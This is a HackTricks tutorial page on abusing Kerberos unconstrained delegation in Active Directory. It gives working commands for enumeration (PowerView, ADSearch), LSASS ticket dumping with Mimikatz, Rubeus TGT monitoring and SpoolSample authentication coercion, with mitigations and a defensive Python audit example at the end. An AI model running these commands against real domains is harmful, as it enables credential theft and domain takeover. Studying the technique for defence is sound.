Unconstrained Delegation
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
- Discover The PEASS Family, our collection of exclusive NFTs
- Get the official PEASS & HackTricks swag
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
- Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.
Unconstrained Delegation
Unconstrained Delegation: a Domain Administrator can enable this setting on any Computer in the domain. From then on, whenever a user authenticates to that Computer with Kerberos, the client obtains a forwardable TGT and sends a copy of it to the service inside the AP-REQ, and that TGT is cached in the memory of LSASS on the host. So, with Administrator privileges on the machine you can dump the cached tickets and impersonate those users against any service in the domain.

Therefore, if a Domain Admin logs in to a Computer with "Unconstrained Delegation" enabled and you have local admin privileges on that machine, you can dump the ticket and impersonate the Domain Admin anywhere (domain privesc).

Computer objects with this setting have the ADS_UF_TRUSTED_FOR_DELEGATION flag (524288 / 0x80000) set in their userAccountControl attribute. Check for it with the LDAP filter '(userAccountControl:1.2.840.113556.1.4.803:=524288)', which is what PowerView does:
```bash
# List unconstrained computers
## Powerview
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem

# Export tickets with Mimikatz
privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way

# Monitor logins and export new tickets
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #Check every 10s for new TGTs
```
Load the ticket of the Administrator (or of the victim user) into memory with Mimikatz or Rubeus and perform a Pass the Ticket attack.
More info: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
More information about Unconstrained delegation in ired.team.
Force Authentication
If an attacker compromises a computer allowed for "Unconstrained Delegation", they can trick a Print server into automatically authenticating against it, which saves the Print server's TGT in the memory of the compromised server.
Then the attacker can perform a Pass the Ticket attack to impersonate the Print server's computer account.
To make a print server authenticate against any machine you can use SpoolSample (reference the unconstrained machine by its DNS hostname, not its IP, so that the print server authenticates with Kerberos and a TGT is forwarded instead of an NTLM authentication):
```bash
.\SpoolSample.exe <printmachine> <unconstrainedmachine>
```
If the TGT belongs to a domain controller, you can perform a DCSync attack and obtain all the hashes from the DC.
More info about this attack in ired.team.
Here are other ways to try to force an authentication:
{% content-ref url="printers-spooler-service-abuse.md" %} printers-spooler-service-abuse.md {% endcontent-ref %}
Mitigation
- Limit DA/Admin logins to specific services and never to hosts trusted for unconstrained delegation.
- Set "Account is sensitive and cannot be delegated" for privileged accounts, or add them to the Protected Users group, which also blocks delegation.
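The two userAccountControl checks on this page (finding computers with ADS_UF_TRUSTED_FOR_DELEGATION set, and verifying that privileged accounts carry the "cannot be delegated" flag) are both bitwise tests on the same attribute. The following is an added example, not code from HackTricks or from any of the tools named above: it builds the extensible-match LDAP filter used above, evaluates the bit-AND matching rule (1.2.840.113556.1.4.803) offline against a constructed set of directory objects, and reports unconstrained hosts (optionally excluding DCs, which are always trusted for delegation) and privileged users that are still delegatable. The sample objects and their flag values are constructed for illustration.

```python
# Added example: offline evaluation of the userAccountControl bit filters
# from this page. The flag constants are the documented ADS_USER_FLAG_ENUM
# values; the directory objects below are constructed sample data.
ADS_UF_WORKSTATION_TRUST_ACCOUNT = 0x1000    # member computer account
ADS_UF_SERVER_TRUST_ACCOUNT = 0x2000         # domain controller computer account
ADS_UF_TRUSTED_FOR_DELEGATION = 0x80000      # 524288: unconstrained delegation
ADS_UF_NOT_DELEGATED = 0x100000              # "Account is sensitive and cannot be delegated"

# OID of the LDAP_MATCHING_RULE_BIT_AND extensible-match rule
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"


def uac_filter(flag, attr="userAccountControl"):
    """Build the bit-AND extensible-match filter for a userAccountControl flag."""
    return f"({attr}:{LDAP_MATCHING_RULE_BIT_AND}:={flag})"


def bit_and_match(uac, flag):
    """Semantics of rule 1.2.840.113556.1.4.803: every bit in flag must be set."""
    return (uac & flag) == flag


# Constructed sample directory objects (not real hosts or accounts).
SAMPLE_OBJECTS = [
    # DC: SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION (always unconstrained)
    {"sAMAccountName": "DC01$", "objectCategory": "computer",
     "userAccountControl": ADS_UF_SERVER_TRUST_ACCOUNT | ADS_UF_TRUSTED_FOR_DELEGATION},
    # member server explicitly trusted for unconstrained delegation
    {"sAMAccountName": "PRINT01$", "objectCategory": "computer",
     "userAccountControl": ADS_UF_WORKSTATION_TRUST_ACCOUNT | ADS_UF_TRUSTED_FOR_DELEGATION},
    # ordinary workstation
    {"sAMAccountName": "WS01$", "objectCategory": "computer",
     "userAccountControl": ADS_UF_WORKSTATION_TRUST_ACCOUNT},
    # privileged user without the "cannot be delegated" flag (0x200 = NORMAL_ACCOUNT)
    {"sAMAccountName": "da.admin", "objectCategory": "person",
     "userAccountControl": 0x200},
    # privileged service account correctly marked as not delegatable
    {"sAMAccountName": "svc.backup", "objectCategory": "person",
     "userAccountControl": 0x200 | ADS_UF_NOT_DELEGATED},
]


def unconstrained_computers(objects, exclude_dcs=True):
    """Computers matching (userAccountControl:1.2.840.113556.1.4.803:=524288).

    DCs are trusted for delegation by design and are usually not a privesc
    target, so they are dropped unless exclude_dcs is False.
    """
    hits = []
    for obj in objects:
        if obj["objectCategory"] != "computer":
            continue
        uac = obj["userAccountControl"]
        if not bit_and_match(uac, ADS_UF_TRUSTED_FOR_DELEGATION):
            continue
        if exclude_dcs and bit_and_match(uac, ADS_UF_SERVER_TRUST_ACCOUNT):
            continue
        hits.append(obj["sAMAccountName"])
    return hits


def delegatable_privileged_users(objects, privileged):
    """Privileged accounts that lack ADS_UF_NOT_DELEGATED, i.e. whose TGT could
    still end up cached on an unconstrained host."""
    return [
        obj["sAMAccountName"]
        for obj in objects
        if obj["objectCategory"] == "person"
        and obj["sAMAccountName"] in privileged
        and not bit_and_match(obj["userAccountControl"], ADS_UF_NOT_DELEGATED)
    ]


if __name__ == "__main__":
    print("filter:", uac_filter(ADS_UF_TRUSTED_FOR_DELEGATION))
    print("unconstrained (non-DC):", unconstrained_computers(SAMPLE_OBJECTS))
    print("unconstrained (all):", unconstrained_computers(SAMPLE_OBJECTS, exclude_dcs=False))
    print("delegatable privileged users:",
          delegatable_privileged_users(SAMPLE_OBJECTS, {"da.admin", "svc.backup"}))
```

The string returned by `uac_filter` is exactly the filter shown above for ADSearch and can be passed to any LDAP client; the bit test in `bit_and_match` is what the directory evaluates server-side, so the same logic works on records exported from a real domain (for example the userAccountControl column of a BloodHound or ldapdomaindump export).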